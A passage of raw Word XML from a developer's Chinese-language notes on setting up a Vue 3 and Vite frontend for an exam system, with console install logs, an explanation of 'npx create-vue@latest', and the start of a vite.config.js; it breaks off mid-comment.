    <w:p w14:paraId="40D36C40" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ECA334" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  npm run dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563DAE19" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174CD55E" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A23A48" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002E497B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cd front</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2D2C4" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047C97BA" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002E497B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD56AFA" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(node:6584) ExperimentalWarning: stream/web is an experimental feature. This feature could change at any time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875B956" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(Use `node --trace-warnings ...` to show where the warning was created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753DAC7" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>- [0/3] Installing vue@^3.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FCE985" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F977C5D" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/ [1/3] Installing @vue/compiler-core@3.3.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AEF19" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0380D3" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linked 26 latest versions fallback to C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front\node_module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53720A53" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linked 1 public hoist packages to C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front\node_modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902ECAA" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Recently updated (since 2023-12-05): 19 packages (detail see file C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E1FC8" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  2023-12-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A561652" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vite@5.0.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rollup@^4.2.0(4.8.0) (14:25:22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A31962" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vue@3.3.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> @vue/compiler-dom@3.3.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> @vue/compiler-core@3.3.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> @babel/parser@^7.23.5(7.23.6) (21:09:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311BD64" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vite@5.0.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rollup@4.8.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>›</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> @rollup/rollup-win32-x64-msvc@4.8.0(4.8.0) (14:25:14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B514F" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run 1 script(s) in 2s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B3572" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installed 3 packages on C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E168D" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> All packages installed (26 packages installed from npm registry, used 3s(network 3s), speed 2.96MB/s, json 47(1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C040BA6" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123F8C6A" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFA7F53" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002E497B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm run dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F34B32" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E98B846" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; front@0.0.0 dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2199D" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; vite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F10A5" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773E8558" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  VITE v5.0.7  ready in 359 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E8764" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AECDC12" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Local:   http://127.0.0.1:5173/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC38916" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Network: use --host to expose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C718D" w14:textId="276EF613" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  press h + enter to show help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D23B1E" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DEF80C" w14:textId="55D9B37F" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="678" w:name="_Toc159780108"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其三：</w:t>
      </w:r>
      <w:r w:rsidRPr="00926A4A">
        <w:t>npx create-vue@latest my-vue-app</w:t>
      </w:r>
      <w:bookmarkEnd w:id="678"/>
    </w:p>
    <w:p w14:paraId="0A642E7F" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C10018" w14:textId="1AA8E5DA" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都不是创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目的标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64888F78" w14:textId="41823698" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npx create-vue@latest my-vue-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74710E" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E2CF2D" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a tool that comes with npm and is used to execute binaries from npm packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232F753" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>create-vue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the name of the Vue CLI plugin for project scaffolding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041324E" w14:textId="7846D5EF" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@latest specifies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that the latest version of the create-vue package should be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61219AE5" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EE6A58" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7327E1F9" w14:textId="75D9CB99" w:rsidR="00926A4A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="679" w:name="_Toc159780109"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建项目配置使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和端口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="679"/>
    </w:p>
    <w:p w14:paraId="3E01568D" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B314D5" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132D92EB" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { defineConfig } from 'vite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669EB41" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import vue from '@vitejs/plugin-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38730B0F" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import WindiCSS from 'vite-plugin-windicss'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C0E40" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223B71E3" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import path from 'path'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8CD3A0" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9F89DF" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// https://vitejs.dev/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49792DAB" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D9C420" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  resolve: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545D2A5" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    alias: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEE7AC" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      "~": path.resolve(__dirname, "./src"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA8242" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763F07A" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D2B46" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3441E3B0" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>真实的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
